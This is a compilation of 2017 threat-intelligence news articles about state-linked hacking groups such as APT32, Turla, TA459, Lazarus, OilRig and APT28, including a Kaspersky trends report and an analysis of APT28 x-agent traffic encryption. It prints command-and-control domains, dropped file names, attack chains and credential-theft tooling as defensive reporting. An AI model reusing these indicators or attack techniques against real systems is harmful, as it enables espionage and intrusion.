- APT -

Last update 09.10.2017 12:41:24

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6  7  8 



APT32: Vietnamese Hackers Target Foreign Corporations

15.5.2017 securityweek APT
APT32 is the "newest named advanced persistent threat group," according to a new report from FireEye. Published yesterday, the report shows it to be a sophisticated and well-resourced cyber espionage actor targeting Vietnamese interests around the globe -- and although not-previously classified in the APTn schema, it has been operating since at least 2013. The APT designation was also commenced back in 2013, when Mandiant used it to describe the first hacking group, APT1, that it was willing to call 'state-sponsored'.

FireEye's analysis stops short of defining APT32 as another state-sponsored hacking group; but that is the clear suspicion. "APT32," writes Nick Carr, senior manager of FireEye's Mandiant Incident Response team, "leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests."

He subsequently told Reuters it was impossible to identify or locate the hackers precisely or confirm they were working for the Vietnamese government but the information they sought would be of very little use to any other party. He also said that in some cases the intrusions seemed to be assessing the victims' adherence to national regulations.

The Vietnamese government denies this. "The government of Vietnam does not allow any form of cyber-attacks against organizations or individuals," said foreign ministry spokeswoman Le Thi Thu Hang. "All cyber-attacks or threats to cybersecurity, must be condemned and severely punished in accordance with regulations and laws."

The APT32 targets include a European corporation that was about to construct a manufacturing facility in Vietnam in 2014; numerous Vietnamese and foreign corporations in 2016; a hospitality developer planning to expand operations in Vietnam in 2016; and the Vietnamese offices of a global consulting firm in 2017. In all cases, espionage would give the Vietnam government either a commercial advantage in discussions, or greater understanding of foreign companies within the country.

Other attacks, however, have been targeted at individuals outside of Vietnam -- more specifically governments, journalists, and members of the Vietnam diaspora who, warns Carr, "may continue to be targeted."

FireEye's isolation of APT32 followed its investigations into intrusions at several corporations with business interests in Vietnam. These investigations provided "sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye's newest named advanced persistent threat group: APT32."

FireEye's analysis of APT32's current campaign depicts a well-resourced and innovative attacker. It uses phishing emails containing a weaponized attachment. Unusually, the attachment is not a Word document but an ActiveMime (an undocumented Microsoft format) file. This file contains an OLE file containing malicious macros.

The attacker also used a novel approach to track the success of its phishing emails, using legitimate cloud-based email analytics. The phishing attachment can contain HTML image tags. "When a document with this feature is opened," writes Carr, "Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms."

If the macros are successfully loaded, they create two scheduled tasks to act as persistence mechanisms for two backdoors. The first launches Squiblydoo, an application whitelisting script protection bypass, to enable the download of a backdoor from APT's infrastructure. The second leads to a secondary backdoor delivered as a multi-stage PowerShell script configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.

APT32's persistence and obfuscation goes further. "Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon's Invoke-Obfuscation framework," notes the analysis.

It is APT32's use of a custom suite of backdoors that has helped FireEye tie different campaigns to this one particular group. That suite includes Windshield, Komprogo, Soundbite, Phoreal, and Beacon. "FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests," writes Carr. He warns that APT32 demonstrates that state-sponsored cyber espionage is no longer necessarily limited to the few known actors: China, Iran, Russia, and North Korea.

"As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets."


The Snake APT Group is preparing its offensive against high-profile Mac users
5.5.2017 securityweek
APT

According to experts from the Fox-IT firm, the notorious Russian Snake APT group is ready to target also Mac users with a new variant of its malicious code.
The sophisticated Russian Snake APT group is back and is leveraging on new malware to target Mac users.The Snake APT group, also known as Turla or Uroburos, has ported its Windows backdoor to macOS.
The cyber espionage crew has been active since at least 2007, the hackers launched several high-profile attacks against targets worldwide, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command.

The Snake APT group

The hackers targeted government entities, embassies, military organizations, research and academic institutions, large corporations and also intelligence agencies.

“Researchers who have previously analyzed compromises where Snake was used have attributed the attacks to Russia. Compared to other prolific attackers with alleged ties to Russia, such as APT28 (Fancy Bear) and APT29 (Cozy Bear), Snake’s code is significantly more sophisticated, it’s infrastructure more complex and targets more carefully selected.” reads the analysis published by the security firm Fox-IT.

“The framework has traditionally focused on the Windows operating system, but in 2014 the first Linux variant was observed. Now, Fox-IT has identified a version of Snake targeting Mac OS X.”

According to the experts, the malicious code used by the Snake APT group is more sophisticated than the ones used by other Russian threat actors, including the notorious APT 28 and APT29.

“Compared to other prolific attackers with alleged ties to Russia, such as APT28 (Fancy Bear) and APT29 (Cozy Bear), Snake’s code is significantly more sophisticated, it’s infrastructure more complex and targets more carefully selected,” said the researchers.

The Snake malware was originally developed to target Windows systems, later in 2014, malware experts from Kaspersky Lab spotted a Linux variant of the malicious code.

The Fox-IT researchers recently spotted a macOS version of the Snake malware that still included artefacts referencing Microsoft’s Internet Explorer in the code, a circumstance that confirms it is a porting from the Windows version. The Russian hackers are improving their arsenal to target Apple users.

The researchers believe the malware is in a testing phase because they haven’t seen the macOS sample being distributed in the wild.

“Several strings found throughout the binary indicate that this version is in fact a debug build”

The Snake macOS sample discovered by the malware researchers at Fox-IT masquerades as a Flash Player installer and is signed with a legitimate Apple code signing certificate, likely stolen by the APT. It obtains persistence via Apple’s LaunchDaemon service.

“The Snake binary comes inside of a ZIP archive named Adobe Flash Player.app.zip which is a backdoored version of Adobe’s Flash Player installer.” continues the analysis.

Fox-IT reported its discovery to the Apple security team.


Chinese TA459 APT exploits CVE-2017-0199 flaw to target Financial firms
3.5.2017 securityaffairs
APT

Malware researchers at security firm ProofPoint reported the Chinese TA459 APT has exploited the CVE-2017-0199 vulnerability to target Financial firms.
The notorious cyber espionage group tracked as TA459 APT has targeted analysts working at major financial firms using the recently patched CVE-2017-0199 Microsoft Office vulnerability.

Experts at Proofpoint published a detailed analysis of the espionage campaign conducted by the TA459 APT group against military and aerospace organizations in Russia and Belarus.

“Proofpoint is tracking this attacker, believed to operate out of China, as TA459. The actor typically targets Central Asian countries, Russia, Belarus, Mongolia, and others.” reads the analysis published by Proofpoint. “TA549 possesses a diverse malware arsenal including PlugX, NetTraveler, and ZeroT”

The TA459 APT group has been active since at least 2013, the hackers leveraged several malware in their campaign, including NetTraveler , PlugX, Saker, Netbot, DarkStRat, and ZeroT. The hackers most focused their efforts on spying on organizations in Russia and neighboring countries.

The attacks conducted by the TA459 APT group were apparently aimed at analysts covering the telecommunications industry, Proofpoint researchers speculate this latest campaign is likely a continuation of the campaign they uncovered in the summer of 2015.

“Proofpoint researchers recently observed a campaign targeting telecom and military in Russia. Beginning in July 2015 (and possibly earlier), the attack continued into August” wrote Proofpoint.

The TA459 APT leveraged spear-phishing emails using weaponized Word document that trigger the CVE-2017-0199 flaw. The hackers started exploiting the Office flaw just a few days after Microsoft released a fix.

When victims open the decoy document, an HTML application (HTA) file disguised as an RTF document is downloaded. The attack exploits PowerShell to download and executes a script that fetches and runs the ZeroT downloader.

Chinese TA459 APT decoy document

Proofpoint noticed some improvements in the last ZeroT version such as the use of a legitimate McAfee utility for sideloading instead of a Norman Safeground utility.

“The attack group has made incremental changes to ZeroT since our last analysis. While they still use RAR SFX format for the initial payloads, ZeroT now uses a the legitimate McAfee utility named mcut.exe instead of the Norman Safeground AS for sideloading as they have in the past. The encrypted ZeroT payload, named Mctl.mui, is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously.” continues the analysis.

Proofpoint reported that the TA459 APT group used both PlugX and a Trojan tracked as PCrat/Gh0st in the last wave of attacks.

The experts invite multinational organizations to stay vigilant about state-sponsored actors that use sophisticated malware in their cyber espionage campaigns.

“Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats, phishing campaigns, and socially engineered threats every day.” concluded Proofpoint.

[adrotate banner=”9″]


Kaspersky Lab APT Trends report, Q1 2017 – From Lazarus APT to StoneDrill
2.5.2017 securityaffairs
APT

Kaspersky is currently monitoring the activities of more than 100 threat actors, from the From Lazarus APT to StoneDrill.
According to the experts from KasperskyLab, the infamous Lazarus APT group, aka BlueNoroff, is the most dangerous threat against financial institutions worldwide.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

Experts at Symantec collected evidence demonstrating the Lazarus APT group was behind the campaign that leveraged on a “loader” software used to stage attacks by installing other malicious programs.

Both US and South Korea governments are blaming Pyongyang for the attacks, but the North Korean government has denied allegations it was behind the hacks.

The Lazarus APT has been associated with numerous cyber attacks against high-profile targets, including the 2014 Sony Pictures hack, the Bangladesh cyberheist at the New York Federal Reserve Bank and the recent attack against banks in Poland.

According to Kaspersky Lab, the hacking campaign against banks worldwide is still ongoing, recently the experts detected new malware samples linked to the group’s activity.

Below the findings of an ATP trends report recently published by Kaspersky Lab:

We believe BlueNoroff is one of the most active groups in terms of attacks against financial institutions and is trying to actively infect different victims in several regions.
We think their operations are still ongoing, and in fact, their most recent malware samples were found in March 2017.
At the moment we believe BlueNoroff is probably the most serious threat against banks.
Kaspersky is currently monitoring the activities of more than 100 threat actors, APT groups and financially motivated cybercrime gangs, that are targeting almost any industry across over 80 countries.

Other APT groups tracked by Kaspersky that were most active in the first quarter of 2017 were Shamoon and StoneDrill APTs. According to the researchers, the groups are distinct, but they share the same two separate likely they are working together to compromise Saudi targets with high sophisticated wiper malware.

The experts linked the StoneDrill malware to Shamoon 2 attacks and Charming Kitten campaign (aka Newscaster and NewsBeef).

The malware was used by threat actors against entities in Saudi Arabia and at least one organization in Europe.

StoneDrill Lazarus APT

The experts discovered many similarities between malware styles and malware components in Shamoon, StoneDrill, and NewsBeef.

Malware researchers highlighted that APT groups leverage on the use of generic tools in attacks making hacked the attribution of the attacks.

“Rather than creating and having their own tools, these use generic tools that are good enough to complete an operation, and provide an evident economic advantage, with the added value of making both analysis of the incident and attribution to a particular actor more difficult.” states the report.

“Nowadays there is a large number of different frameworks providing cyber-actors with many options, especially for lateral movement. This category includes Nishang, Empire, Powercat, Meterpreter, etc. Interestingly, most of these are based on Powershell, and allow the use of fileless backdoors.”


APT Trends report, Q1 2017
2.5.2017 Kaspersky
APT

APT FILELESS MALWARE INTERNET BANKING LAZARUS TARGETED ATTACKS WIPER
Kaspersky Lab is currently tracking more than a hundred threat actors and sophisticated malicious operations targeting commercial and government organizations in over 80 countries. During the first quarter of 2017, there were 33 private reports released to subscribers of our Intelligence Services, with Indicators of Compromise (IOC) data and YARA rules to assist in forensics and malware-hunting.

We continue to observe a sharp rise in the sophistication of attacks with nation-state backing and a merger of tactics, techniques, and procedures (TTPs) between APT actors and financially motivated cybercriminals. We have witnessed the Middle East becoming one of the major cyber battlefields. At the same time, during Q1 2017, the discovery of a new Wiper victim in Europe raised eyebrows and suggested that these kinds of destructive attacks have now spread beyond the Middle East.

In this report, we discuss the targeted attack highlights from the first quarter of 2017, and discuss some emerging trends that demand immediate attention.

Highlights in targeted attacks

Evolution of Wipers: a new weapon for APT actors

During the last few months a new wave of wiper attacks, mainly focused against Saudi interests, raised a red flag for many companies, and for a good reason. The new wave of Shamoon attacks apparently relied on stolen credentials from Active Directory for their internal distribution stage. The investigation of these attacks lead us to the discovery of a new wiper we called StoneDrill.

We believe both Shamoon and StoneDrill groups are aligned in their interests, but are two separate actors, which might also indicate two different groups working together.

Our technical analysis of StoneDrill lead to the discovery of old samples (2014) in our collection that share their base code with the new StoneDrill samples. Interestingly, these old samples were attributed to the NewsBeef (Charming Kitten) group. The similarities between samples include sharing the same credentials (username and password) for C2 communications, which establish a very strong link between them.

Figure 1. Credentials used for C2 communication both in StoneDrill and NewsBeef samples

We believe that StoneDrill might be a more recent version of NewsBeef artifacts, effectively relating the known APT actor with this new wave of wiper attacks.

In addition, and related to the Shamoon attacks, we have collected different artifacts that might have been used by the actor during the first stages of attack. This first stage is critical, as credentials need to be stolen for the subsequent distribution of the malware at the victim’s premises.

Ismdoor is a backdoor found to be related to the Shamoon attacks, and might serve well for the attackers’ purposes. This tool was found mainly in Saudi Arabia and belongs to the oil and energy industry. The analysis revealed very interesting details about additional tools used by the attackers for lateral movement, which were mainly based in Powershell-based exploitation frameworks, following the trend of using fileless generic malware explained later in this report.

Finally, it is remarkable that we have detected the first victim of StoneDrill in Europe. The victim belongs to the energy industry, something which might be an indicator that this actor is spreading out of the Middle East. After attributing this wiper with what we believe might be a government-sponsored actor, this fact is highly worrying, as it might indicate a geopolitically-motivated spread of cyber-sabotage operations. This last assumption is yet to be confirmed.

Summary:

Wipers are now extending their geography
Wipers are now a part of the arsenal of APT groups. They can be used in destructive operations, as well as for deleting traces after a cyberespionage operation.
One of the modules used in the last Shamoon wave of attacks had ransomware capabilities, which might be considered another form of not-so-obvious wiping.
The fact that these destructive operations against energy companies might be related to some government sponsored APT actors is definitely worrying, and surpasses typical espionage operations.

BlueNoroff/Lazarus: bank robbery, evolved

A massive waterhole attack targeting Polish banks was publicly disclosed on 3 February, 2017. The attack leveraged the webserver of a Polish financial sector regulatory body, the Polish Financial Supervision Authority (www.knf.gov.pl), which was hacked and used to redirect users to an exploit kit. A very similar technique was used against the Mexican financial authority at the same time, and even if no other victims of this group were made public, it is very likely that more banks were also similarly affected.

Our analysis linked the attack with the BlueNoroff/Lazarus group, which has been responsible for multiple other bank attacks, including the famous Bangladesh bank heist. This waterhole attack revealed, for the first time, one of the strategies used by BlueNoroff for gaining a foothold in its target organizations. Although the attack didn’t use any zero days, the Flash Player and Silverlight exploit appeared to be enough to compromise a large number of banks, which were running on outdated software.

Indeed, we started tracking the BlueNoroff actor a long time ago. We originally saw this actor trying to infect banks in the South-East Asian region. BlueNoroff has developed a characteristic set of tools for lateral movement inside targeted organizations, and in several cases attempted tampering with SWIFT software for cashing out. This technique showed its enormous potential with the Bangladesh central bank heists, where attackers attempted to steal more than 900 million USD. In the February “Polish case”, we saw the group reusing these known lateral movements tools repackaged for their new wave of victims. This provided us with a high degree of confidence in attributing the attack to this actor.

Interestingly, the BlueNoroff group planted Russian words within the code, to derail investigators and avoid attribution. The code contained grammar errors a native Russian speaker wouldn’t make, and sentences were likely translated using online tools.

Summary:

We believe BlueNoroff is one of the most active groups in terms of attacks against financial institutions and is trying to actively infect different victims in several regions.
We think their operations are still ongoing, and in fact, their most recent malware samples were found in March 2017.
At the moment we believe BlueNoroff is probably the most serious threat against banks.
Fileless malware: enough for the job with no attribution

Avoiding attribution is one of the key goals for many APT actors, especially since a large number of operations have been exposed in recent last years. For the most sophisticated groups, the problem is that they already have their well established procedures, specially crafted tools and training, that do not always allow them to stay unnoticed.

But that is not the case for the not-so-big actors or cybercriminals. Rather than creating and having their own tools, these use generic tools that are good enough to complete an operation, and provide an evident economic advantage, with the added value of making both analysis of the incident and attribution to a particular actor more difficult.

Nowadays there is a large number of different frameworks providing cyber-actors with many options, especially for lateral movement. This category includes Nishang, Empire, Powercat, Meterpreter, etc. Interestingly, most of these are based on Powershell, and allow the use of fileless backdoors.

We have seen such techniques being widely adopted in the last few months. We find examples in the lateral movement tools used in Shamoon attacks, in attacks against Eastern European banks, and used by different APT actors such as CloudComputating, Lungen or HiddenGecko, as well as in the evolution of old backdoors like Hikit, which evolved to new fileless versions.

This trend makes traditional forensic analysis harder, traditional IOCs such as file hashes obsolete, application whitelisting more difficult, and antivirus evasion easier. It also helps to evade most of the log activity.

On the other hand, attackers usually need to escalate privileges or steal administrator credentials, they don´t usually have a reboot survival mechanism in the machines they want to infect, and they rely on accessing them when they are reconnected to the infected network. The use of standard tools in the victim environment might also limit their options. This new paradigm is still unfolding and the best practices from a defense perspective are currently not totally clear. However, we offer our recommendations in the final section of this document.

Summary:

No malware samples are needed for the successful exfiltration of data from a network.
The use of standard and open source utilities, combined with different tricks, makes detection and attribution almost impossible.
The determination of attackers to hide their activity and make detection and incident response increasingly difficult explains the latest trend of anti-forensic techniques and memory-based malware. That is why memory forensics is becoming critical to the analysis of malware and its functions.
Incident response in cases like this is key.
How to keep yourself protected

Exploiting vulnerabilities remains a key approach to infecting systems, therefore timely patching is of utmost importance – which, being one of the most tedious IT maintenance tasks, works much better with good automation. Kaspersky Endpoint Security for Business Advanced and Kaspersky Total Security include Vulnerability & Patch management components, offering convenient tools for making patching much easier, and much less time-consuming for IT staff.

Given the trend of using Powershell-based techniques, including bodiless malware scenarios, you need to make sure that your security solution is aware of such specifics. All tiers of Kaspersky Security Endpoint Security for Business as well as Kaspersky Security for Virtualization possess the broadest range of machine learning-powered detection techniques including those specifically taking care of malware using Powershell. Our behavioral System Watcher technology is also aware of specific Wiper activities like mass file deletion; after blocking the malware, its Rollback feature brings important user files back from their deleted state.

Still, it is necessary to understand that targeted attacks are dangerous not only because of their sophistication (which sometimes is not the case), but because they are usually well-prepared, and try to leverage security gaps unobvious to their targets.

Therefore, it is highly recommended that you arm yourself not only with prevention (such as endpoint protection) but also with detection capabilities, specifically with a solution that can detect anomalies in the whole network’s ongoing activities, and scrutinize suspicious files at a much deeper level than it is possible on users’ endpoints. Kaspersky Anti Targeted Attack is an intellectual detection platform that matches events coming from different infrastructure levels, discerns anomalies and aggregates them into incidents, while also studying related artifacts in a safe environment of a sandbox. As with most Kaspersky products, Kaspersky Anti Targeted Attack is powered by HuMachine Intelligence, which is backed by on premise and in lab-running machine learning processes coupled with real-time analyst expertise and our understanding of threat intelligence big data.

And the best way to prevent the attackers from finding and leveraging security holes is getting rid of them all, including those involving improper system configurations or errors in proprietary applications. For this, Kaspersky Penetration Testing and Application Security Assessment services can become a convenient and highly effective solution, providing not only data on found vulnerabilities, but also advising on how to fix it, further strengthening corporate security.


The massive attack against Israel was alleged launched by the Iranian OilRig APT group
28.4.2017 securityaffairs
APT

According to the experts at the security firm Morphisec that massive attack against Israeli targets was powered by the OilRig APT group.
Yesterday the Israeli Cyber Defense Authority announced it has thwarted a major cyberattack against 120 targets just days after harsh criticism of new cyber defense bill.
In a first time, the authorities blamed a foreign state for the massive cyber espionage campaign against major Israeli institutions and government officials, now the Authority blames Iranian state-sponsored hackers for the cyber attack.

The Israeli experts believe that attack was launched by the OilRig APT group (aka Helix Kitten, NewsBeef ), an Iran-linked APT that has been around since at least 2015.

According to the Israeli Cyber Defense Authority, hackers targeted against some 250 individuals between April 19 and 24 in various sectors, including government agencies, high-tech companies, medical organizations, and educational institutions. including the renowned Ben-Gurion University.

Hackers also targeted experts at the prestigious Ben-Gurion University, where researchers conduct advanced researchers. The threat actors leveraged stolen email accounts from Ben-Gurion to deliver malware to victims.

“From April 19-24, 2017, a politically-motivated, targeted campaign was carried out against numerous Israeli organizations. Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details. Initial reports of the attacks, published April 26 (in Hebrew) by the Israel National Cyber Event Readiness Team (CERT-IL) and The Marker, confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel. Ironically, Ben-Gurion University is home to Israel’s Cyber Security Research Center.” reads the analysis shared by Morphisec. “Investigators put the origin of the attack as Iranian; Morphisec’s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns.“

Hackers used weaponized Word documents triggering the recently-patched Microsoft RCE vulnerability, tracked as CVE-2017-0199.

OilRig APT group Cyberattack on Israel

The exploitation of this specific flaw demonstrates the technical evolution of the OilRig APT group. The attack doesn’t request user’s interaction like macro-enable attacks, the weaponized document contains an exploit via an embedded link packed with an HTML executable.

“The attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word, CVE-2017-0199, by actually reusing an existing PoC that have been published immediately after the patch release. Microsoft released the patch for the vulnerability on April 11 but many organizations have not yet deployed the update. The delivered documents installed a fileless variant of the Helminth Trojan agent.” continues the analysis.

Experts at Morphisec discovered that hackers used a customized version of the open-source Mimikatz tool to gain access to user credentials in the Windows Local Security Authority Subsystem Service.

“Morphisec identified few more samples of communication with different other C&C servers (“alenupdate[.]info” and “maralen[.]tk”) in which a more advanced customized version of Mimikatz has been sent to specific users and additional agent have been installed in “C:\Program Files (x86)\Microsoft Idle\” directory:” states Morphisec.

Early this year the OilRig APT was involved in a string of cyber attacks targeted several Israeli organizations, including IT vendors, the national postal service, and financial institutions.

Security experts from ClearSky discovered that the Iranian hackers set up a fake Juniper Networks VPN portal and used compromised email accounts from IT vendors to lure victims to it. According to ClearSky, OilRig APT leveraged digitally signed malware and fake University of Oxford domains in its campaign.


Cracking APT28 traffic in a few seconds
27.4.2017 securityaffairs
APT

Security experts from security firm Redsocks published an interesting report on how to crack APT28 traffic in a few seconds.
Introduction
APT28 is a hacking group involved in many recent cyber incidents. The most recent attack allegedly attributed to this group is the one to French presidential candidate Emmanuel Macron’s campaign. Incident response to this Advanced Persistent Threats (APT) and damage limitation heavily relies on network traffic investigation.

In late 2016, Redsocks security identified one expired domain attributed to APT28. Our effort to sinkhole APT28 based on using this domain was impeded by the encrypted communication channel. Although many published white papers concerning APT28 such as ESET mentions RC4 encryption algorithm, they do not dig into the details of the used key and the details of APT28 implementation of RC4; whether the key is static and breakable. In this report, we aim to reveal the result of our comprehensive dynamic analysis of x-agent malware towards decrypting its traffic. We started our investigation by using one of the APT28 droppers (see Table 1).

APT28

The focus of our investigation has been decrypting APT28 communicated traffic. Thus, this report elaborates more on encryption functionality of x-agent and reports our finding on cracking x-agent communicated traffic. That said, our report is not limited to encryption cracking and sheds light on following:

Execution behavior of the dropper and x-agent
Network behavior of x-agent
Encryption of APT28 and an algorithm to crack it in few seconds
Following the encryption-decryption scheme we present, and by vast internet scanning and searching for the URL pattern we introduce in this white paper, current active APT28 servers and victims can be found. Communication to these servers for further investigation can be established.

X-agent dropper
The dropper functions in two steps. In the first step, it only unpacks a dll to the Windows folder. The name of the file is fixed (static) and it does not change by multiple executions or on different workstations. In the second step, the dropper loads the dll by calling ShellExecuteW function of shell32 library. This function is called by rundll32.exe, and “”C:\Windows\83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll”,init” as arguments. This means the trace of the malware, later, should be looked in rundll32 execution. The dropper also creates “ose00000.exe” file in the windows folder and calls it with arguments to the dll and the dropper path address. In summary, the dropper creates two files “83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll” and “ose00000.exe” in windows directory with hidden attribute (see Table 1 for the corresponding hashes) and loads one with rundll32.exe. The result of the dropper execution is rundll32.exe and ose00000.exe as two separate processes. No network activity was observed during dropper execution.

X-agent dropped rootkit
The dropper goal was to transfer control to 83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll (see Table 1 for SHA256 hash) which is a rootkit with keylogging and remote code execution capabilities.

X-agent architecture

x-agent has a sophisticated architecture; it has a modular structure in both functionalities and the communication channel implementation. Figure 1 presents the x-agent architecture of the sample we analyzed.

APT28 2

X-agent execution

The execution starts from init function of the loaded dll by rundll32. The first interesting event after transferring control to Init is a call to KERNEL32.GetVolumeInformationW. After this call, the Init function initializes the global variables:

APT28

Next, the init function initializes the available modules for execution (see ESET report on the explanation of modules). Our malware sample had 3 modules:

KeyLogging modules, dubbed in code as modKey
File system module, dubbed in code as modFS
Remote Shell module, dubbed in code as modProcRet
After initializing the data structure of these modules, CHOPSTICK creates different threads for different tasks. Modules are created in a loop based on their configuration and AgentKernel is created differently:

APT28

After creation of the threads, execution is transferred to AgentKernel and Module threads. Agent Kernel module initially prepares a message for the server and then waits for the server to respond with a command. The message intends to introduce the victim by an agent ID to the server and report the supported modules for execution. This message is written to edg6EF885E2.tmp file in the temp folder. The sample we analyzed communicates over HTTP channel. The implementation is using WININET APIs.

Before sending data, the channel thread checks the connectivity to the server. It, first, tries to resolve “adobeincorp.com” domain name. If it fails, it tries connecting to two hardcoded IP addresses. After successful connection to the server, it creates the URL request and post data based on the data prepared by other modules. X-agent first sends a get request and then a post request. The communication is always encrypted. We explain the nature of communicated data and the encryption method in the next section.

In summary, these sequences of actions happen in every execution of x-agent:

Call to KERNEL32.GetVolumeInformationW
Creation of at least 5 different threads
Read and write to edg6EF885E2.tmp in the temp directory
Check connectivity by call to socket.connect
Encrypt URL query string and POST data
Sends a get request
Sends a post request
Send supported commands and the agent number to server using WININET Http APIs.
X-agent traffic communication

In order to explain how to decrypt APT28 traffic, we first need to understand the traffic pattern of the malware. The x-agent version 1 we analyzed communicates by sending an initial GET request following by HTTP post requests. The http header values of the requests are hardcoded except one query string of the request. The URL of a x-agent traffic looks like:

/webhp?rel=psy&hl=7&ai=L2Bd93t_o-jl022K1Og4Bm9mSk8QO88K_3ZQZuKcoPwur-5Q7Y=

“/webhp?rel=psy&hl=7&ai=” part of the URL and the final “= “sign are persistent in different executions. As a matter of fact, “/webhp?rel=psy&hl=7&ai=” is hardcoded in the code. The next 51 bytes are not in plaintext; briefly, it contains the timestamp of the request and the ID of the agent. The initial POST data of x-agent is 71 bytes and ends with a = as well. The data is encrypted and when decrypted is equal to:

56 34 4D 47|4E 78 5A 57|6C 76 63 6D|68 6A 4F 47|39 79 5A 51|6B 30 84 F2|01 00 00 01|00 23 01 10|

23 01 11 23|01 13 23

The blue part is the ID of the agent (the victim). The yellow part is the ID of the module who sent the data. And finally, the green part is actually the list of modules separated by # character (0x23) that are installed and ready to be used by the server (see Figure 4 for more explanation).

Below is the Http implementation of the channel by x-agent:

APT28

X-agent traffic encryption
Encryption module

The encryption procedure is called with two arguments. The pointers are to two data structures. These data structures provide a reference to the two following data for the encryption class:

The seed for encryption
The data to be encrypted
The seed is hardcoded and, among others, the init function copies it to the data segment using immediate constants:

APT28

Later, in the code, 4 random bytes are appended to the seed and these altogether form the key for encryption. The seed is 50 bytes and the key length in total is 54 bytes. The data can be of variable size. For instance, the default initial request from AgentKernel is 39 bytes (see Figure 4) in total and includes: agent ID, module ID (the sender of the message) and the supported modules. The data is always appended to a 20 bytes data token, agent ID and the sender module ID. This data token is used for decryption result verification by the server. After creating the cypher using RC4 (see the next section), the encryption procedure adds a 8 random value to the message and then converts the whole binary string to URL compatible BASE64. . Next, the encryption procedure adds a 7-byte time stamp to the message. In summary the encryption class does the following:

Generate random 4 bytes
Encrypt the message using RC4
Add 8 random bytes to the message
Convert the binary string to BASE64
Add a timestamp to the message (7 bytes in BASE64)
RC4 function

RC4 is a stream cypher algorithm and is based on byte permutation. The elaborate explanation of RC4 is out of the scope of this paper. The below code is the implementation of RC4 algorithm by x-agent. The arguments to the function are 4 bytes random value, seed and the plaintext data:

CPU Disasm

APT28

How to decrypt x-agent data

As mentioned briefly, the only randomness in the x-agent encryption is a 4 random bytes appended to a 50 bytes seed that has been given in the previous section. Since RC4 is a synchronous stream cypher, one can decrypt the traffic only with the same key that is used for encryption. A decryption algorithm for x-agent must use the same RC4 function for decryption with the same arguments. The cypher input must be the same data byte stream from the http request i.e. the timestamp and random bytes must be stripped. The RC4 function must be called in a bruteforced way with all possible values from 0 to -1. This is a known plain-text attack since the result must contain “V4MGNxZWlvcmhjOG9yZQ”. The encryption must be broken in a matter of seconds with a normal personal computer.


Denmark blamed Russia APT28 group for cyber intrusions in Defense Ministry Emails
25.4.2017 securityaffairs
APT

Denmark on Monday denounced Russia after the publication of a report that accused Russian APT28 of hacking the defense ministry’s email accounts.
Today the Danish Government officially blamed Russia for cyber attacks against its Defense Ministry. Denmark denounced a cyber intrusion in several Defense Ministry’s email accounts. The accusation comes after the publishing by the Centre for Cyber Security on Sunday of a report that accuses a Russian APT group of a security breach that affected emails of defense ministry employees in 2015 and 2016.“This is part of a continuing war from the Russian side in this field, where we are seeing a very aggressive Russia,” Defense Minister Claus Hjort Frederiksen told Danish news agency Ritzau.
APT28 hacked Danish Defense Ministry

According to the Ministry, the emails don’t contain secret information, but the intrusion represents a serious threat to the state.

“The hacked emails don’t contain military secrets, but it is of course serious,”

According to the report, hackers belonging to the notorious APT28 group (also known as Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team), were responsible for the cyber espionage campaign that targeted the Danish Defense Ministry.

The APT28 group was also involved in many other attacks against a number of European states, including Germany and France.

In Denmark, the Centre for Cyber Security said earlier this year that the threat against Danish authorities and companies remained “very high”.


Chinese APTs targeted the South Korean THAAD anti-missile systems
22.4.2017 securityaffairs
APT

According to researchers at FireEye, Chinese hackers targeted the South Korean Terminal High Altitude Area Defense (THAAD) missile system.
According to a new investigation conducted by security firm FireEye, Chinese hackers are trying to hack systems used by South Korea military to interfere with the deployment of an anti-ballistic weapons system.

The news was confirmed by the FireEye’s director of cyber-espionage analysis John Hultquist in an interview with the Wall Street Journal.

FireEye has observed cyber attacks aimed to hack the Terminal High Altitude Area Defense (THAAD) missile system. The THAAD system was designed by South Korea to protect the country from the incoming intercontinental ballistic missile (ICBMs), it is part of the Star Wars defense system.

THAAD anti missile system
South Korea is deploying Lockheed Martin’s THAAD missile defense system (Image source Ars Technica)

China has long been in opposition to the deployment of the THAAD since South Korea announced it as a key component of its defense infrastructure.

“China opposes Thaad, saying its radar system can reach deep into its own territory and compromise its security. South Korea and the U.S. say Thaad is purely defensive. The first components of the system arrived in South Korea last month and have been a key issue in the current presidential campaign there.” reported the WSJ.

According to FireEye, at least two different Chinese hacking crews were involved in cyber attacks against the South Korean military systems that in some way were linked to the design and deployment of the THAAD.

The two teams involved in the attack are the Tonto team and the notorious APT10.

